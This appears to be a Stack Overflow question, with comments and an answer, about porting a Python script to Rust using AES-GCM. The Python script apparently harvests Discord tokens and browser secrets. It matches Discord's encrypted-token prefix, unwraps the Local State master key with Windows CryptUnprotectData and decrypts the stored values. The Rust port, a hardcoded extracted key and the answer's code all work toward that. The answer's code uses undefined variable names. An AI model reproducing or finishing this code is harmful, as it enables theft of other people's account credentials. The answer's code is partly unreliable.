# How to use AES GCM with specific bytes key in rust

Tags: rust, cryptography, aes-gcm

I am trying to translate a long algorithm written in python to rust. The algorithm works by reading a key from a file, and then using that key to decrypt strings of text with AES - GCM. In python, this works perfectly with the `Crypto.Cipher` module. When searching for an equivalent crate in rust, I found `aes_gcm`, and tried following the example.

The password is stored encoded in base64, and when decoded, it converts to a non-UTF array of bytes, which I dont know if it is a source of the problem.

Firstly I tried creating a key first like in the example, via `let key = Aes256Gcm::generate_key(password);`, where `password` was a String, or a &str, none of which worked. By reading the errors, I discovered the key should be a `GenericArray`. When searching github for code example usage, I saw the only method for creating these is the `GenericArray::from_slice()`, which I tried by passing a Vector converted to a slice. This however yields the following error

```
thread 'main' panicked at 'assertion failed: `(left == right)`
  left: `267`,
 right: `32`'
```

267 is the length of the password, therefore, I re-read the original algorithm and discovered it aplied a function to the key before using it, particularly, `master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]` from the `win32crypt - CryptUnprotectData` module. I also dont know how to translate this bit of code, but for testing purposes, I extracted the password the python algorithm yields, and inputed it directly to my rust code just as a test.

This time, an `aead::Error` is yielded, without further context. I dont know where im going wrong with all of this, and I don't have extensive knowledge of AES - GCM, so any help would be apreciated.

This is also the rust code which throws the errors. Note that all the ranges done to the original key are just translated from the python algorithm. The commented lines are past things attempted just as examples

```
fn decrypt_encrypted_strings(input_string: String, password: &Vec<u8>) -> String {
    
    //let format_password: BlockRng = BlockRng::new(password);
    //let key = Aes256Gcm::generate_key(password.into());
    //let key = GenericArray::from_slice(&password[..]);
    let key = GenericArray::from_slice(b"S\x06\x82VY\xe2E\x88\xa0\xc6\xe5ER?\xce!\xe1\xcf\x9b\xeb\xe3\xc1\xe39\xf0\x85\xa6\x97d\xc88\xe4"); // using password extracted by python algorithm directly
    let cipher = Aes256Gcm::new(&key);
    let nonce = Nonce::from_slice(&input_string[3..15].as_bytes());
    let plaintext = match cipher.decrypt(nonce, &*input_string[15..].as_ref()) {
        Ok(v) => v,
        Err(e) => {
            println!("error: {}", e);
            return String::new()
        }
    };
    println!("{:?}", plaintext);
    return String::from(plaintext); // I know this is an error, but its not the problem

}
```

And this is where it is being called, the encoded strings are being parsed out of a file

```
for line in s.lines() {
    if let mat = re.captures(line) {
        if let Some(mat) = mat {
            let text = decrypt_encrypted_strings(mat.get(0).unwrap().as_str().to_string(), &bytes); // here the string is being decrypted
                if !decrypted_strings.contains(&text) {
                    decrypted_strings.push(text);
                }
            }
        }
}
```

This is the python algorithm I am trying to translate

```py
import os
import base64
import json
import winreg
from re import findall, match
import requests
from Crypto.Cipher import AES
from win32crypt import CryptUnprotectData

def grab_data():

    # Initialization and searching of paths not shown as it is not relevant

    regex = r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$]*"

    for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
        for y in findall(regex, line):
            plaintext_string = decrypt_password(base64.b64decode(y[:y.find('"')].split('dQw4w9WgXcQ:')[1]), get_master_key(<path_to_password_file>))
                if not plaintext_string in strings:
                    strings.append(plaintext_string)
    return strings

def decrypt_password(buff, master_key):
    try:
        # Initialization Vector
        iv = buff[3:15]
        payload = buff[15:]
        cipher = AES.new(master_key, AES.MODE_GCM, iv)
        decrypted_pass = cipher.decrypt(payload)
        decrypted_pass = decrypted_pass[:-16].decode()
        return decrypted_pass
    except Exception:
        return "Failed to decrypt password"

def get_master_key(path):
    with open(path, "r", encoding="utf-8") as f:
        local_state = f.read()
    local_state = json.loads(local_state)

    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]
    master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key

data = grab_data()
```

Comment: Did you try ? https://stackoverflow.com/questions/60335822/how-to-use-genericarray. Also je careful this is low level functions not to be use in production.

Comment: I just tried this, however, it seems this function does not exist
`could not find block_cipher_trait in aes_gcm`

Comment: Hi, I think it returns to you an error => ```error: aead::Error```. Seems like it couldn't decrypt a message. Could you please share an example of strings that you tries to decrypt?

Comment: Sure, here is an example  `:djEwG1x+sroDZONMB6In7+jkHujvTPot6CxD+G2sF7K3WmSRjfFDSfnds5/2Kn5LBXp9WKphgVW/aG7tbqXwUmOOi5VzgNwip8vjCs7dfLAoQYEP7nlD+bvtzJq4a4R1DVNFs=`

Answer (score -1):

Since the question isn't closed, i am assuming the problem hasn't been solved although, it has been 5 months

You're input is probably wrong, it has many problems (it worked with my input )

1. the input shouldn't have `:` at the beginning and also it should have two `==` at the end and not one

> Sure, here is an example :djEwG1x+sroDZONMB6In7+jkHujvTPot6CxD+G2sF7K3WmSRjfFDSfnds5/2Kn5LBXp9WKphgVW/aG7tbqXwUmOOi5VzgNwip8vjCs7dfLAoQYEP7nlD+bvtzJq4a4R1DVNFs=
> martin

2. and then the "input_string" should be decoded in base64

I recommend you first test your inputs in python and make sure they work, and then paste them in you're rust code

my example:

```
fn decrypt_encrypted_strings() {
    let input_string = b" -your input string in base64- ";
    let key = GenericArray::from_slice(b" -you key- ");

    let cipher = Aes256Gcm::new(&key);
    let nonce = Nonce::from_slice(&myy[3..15]);
    let plaintext = cipher.decrypt(nonce, &*myy[15..].as_ref()).unwrap();
    println!("{:?}", plaintext);
}
```

Edit: here the test for python

```
import base64
from Crypto.Cipher import AES

def decrypt_val(buff: bytes, master_key: bytes) -> str:
    iv = buff[3:15]
    payload = buff[15:]
    cipher = AES.new(master_key, AES.MODE_GCM, iv)
    decrypted_pass = cipher.decrypt(payload)
    decrypted_pass = decrypted_pass[:-16].decode()

    return decrypted_pass

input = base64.b64decode("djEwG1x+sroDZONMB6In7+jkHujvTPot6CxD+G2sF7K3WmSRjfFDSfnds5/2Kn5LBXp9WKphgVW/aG7tbqXwUmOOi5VzgNwip8vjCs7dfLAoQYEP7nlD+bvtzJq4a4R1DVNFs==")
key = b"S\x06\x82VY\xe2E\x88\xa0\xc6\xe5ER?\xce!\xe1\xcf\x9b\xeb\xe3\xc1\xe39\xf0\x85\xa6\x97d\xc88\xe4"

print(decrypt_val(inpu, key))
# i used your input and it failed
```